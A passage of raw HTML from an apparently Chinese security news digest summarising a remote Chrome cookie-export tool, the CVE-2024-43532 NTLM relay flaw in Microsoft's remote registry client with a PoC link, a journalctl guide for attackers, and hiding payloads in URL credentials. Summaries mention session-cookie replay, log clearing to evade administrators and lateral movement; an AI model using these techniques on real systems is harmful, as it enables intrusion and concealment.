4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">remotechrome_curl</code> 是专门为了远程操作和调试 Chrome 浏览器而设计的工具，它们提供了强大的功能和灵活的配置选项。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">这些工具支持多种认证方式，包括传统的 NTLM 哈希认证和现代的 Kerberos 认证，以及 AES 加密，这使得它们可以在各种安全环境中使用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过将 cookies 导出为 JSON 格式，<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">remotechrome</code> 提供了一种方便的方式来分析和重放用户会话。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">这些工具的命令行界面设计简洁，易于集成到自动化脚本和安全测试工作流中。</section></li></ul>
	<br/>
	<p>🏷️: 远程访问, Chrome, 安全漏洞, 概念验证</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0d
			 微软远程注册表客户端中的权限提升漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Akamai 研究人员 Stiv Kupchik 发现了 Microsoft 远程注册表客户端中的一项新的提权漏洞 CVE-2024-43532，该漏洞通过利用 WinReg 客户端实现中的回退机制，可以将客户端的 NTLM 认证详情中继到 Active Directory 证书服务 (ADCS)，进而获取用户证书以在域中进一步进行认证。该漏洞已在 2024 年 10 月的 Patch Tuesday 中被修复。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:poc地址: <a href="https://github.com/akamai/akamai-security-research/tree/main/PoCs/cve-2024-43532" target="_blank">https://github.com/akamai/akamai-security-research/tree/main/PoCs/cve-2024-43532</a></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">NoHat 2024 大会总结：RPC、身份验证等技术解析</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAV0vy8IoqP73CbISBic4I6saEIGJXDsXjycISdHjiczLFIrnRwWnUREdA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAV0vy8IoqP73CbISBic4I6saEIGJXDsXjycISdHjiczLFIrnRwWnUREdA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1525444215122822"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">MS-RPC 是 Windows 操作系统的核心组件，但随着时间的推移，安全原则的演变使得大多数 RPC 服务器和客户端现在都是安全的。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">WinReg 客户端 中的回退机制可能会在 SMB 传输不可用时使用不安全的认证级别，导致 NTLM 中继攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过中继 NTLM 认证到 ADCS 来请求用户证书，然后利用该证书在域中进行认证，而不需要再次中继认证。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">尽管 RPC 协议 本身设计时考虑了安全性，但仍然可能发现一些不安全的接口实现，这表明网络防御必须非常严格，以防止任何古老的接口暴露或运行。</section></li></ul>
	<br/>
	<p>🏷️: RPC, 权限提升, 漏洞, 微软, 远程注册表</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0e
			 黑客基础：Linux 日志系统</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了Linux操作系统中的日志系统，特别是journalctl这一工具的使用方法和在网络战中的重要性。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5916666666666667" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9eedba1c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EA4ZwTeMoOf0iaX0jwHPYnVJG86kNUc2ia6ZcDjPMABRn8vXriaOiapAeibHg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.4990583804143126" data-w="1062" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=d28efb34&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EA1BRW2DGJa7ulOHvwWXHsgsrtVknQq6QvRhnQkYsRx16rrVzDDKvQ8Q%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.45684803001876173" data-w="1066" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=8f22f0b9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAdK7r3nYbHwPgx4wIiaWsfxfrK6X9OrjJricvveXdibsAzqzhyOx6Ozbew%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Journalctl指南：黑客的Linux日志系统指南</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAJtLm9H8iaiaH78a9AOg63OfjzeTMtMxmfpzYB0FIaxgQN7Z0YUHSY51Q/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAJtLm9H8iaiaH78a9AOg63OfjzeTMtMxmfpzYB0FIaxgQN7Z0YUHSY51Q/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8858222542488482"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">journalctl是现代Linux系统中的核心日志管理工具，它提供了强大的查询和分析功能。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">对于网络战的参与者来说，理解和能够操作journalctl是至关重要的，因为它可以用于收集情报、监控系统、清理痕迹以及建立持久化访问。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">虽然journalctl提供了许多优势，但它的日志记录和安全特性也为攻击者的行为留下了更多的痕迹，增加了被发现的风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">在进行日志操作时，攻击者需要采取精心的方法来避免引起系统管理员的怀疑，例如通过例行维护的方式清理日志，以及在进行横向移动时模仿正常的通信模式。</section></li></ul>
	<br/>
	<p>🏷️: Linux, 日志系统, 黑客, 系统管理, 安全工程</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0f
			 在URL凭证中隐藏有效载荷</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Johan Carlsson 发现可以在 URL 的凭证部分隐藏有效载荷，这种方法在 Chrome 和 Firefox 中能够使有效载荷在地址栏中不可见，并且在同源导航中仍然有效。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="114" src="https://wechat2rss.xlab.app/img-proxy/?k=649e649b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EArmFSEawe0wFia7vkQDMfYlj9ibyPe0Et6cyUQcwYTDStQHlltZj6DF1Q%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.4883227176220807" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="942" src="https://wechat2rss.xlab.app/img-proxy/?k=b87a3eac&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAVuccowgyqoTGT379xKohJHzQTz0R9ibxXtYMmc1rhjicEibDeIhoGhSQQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
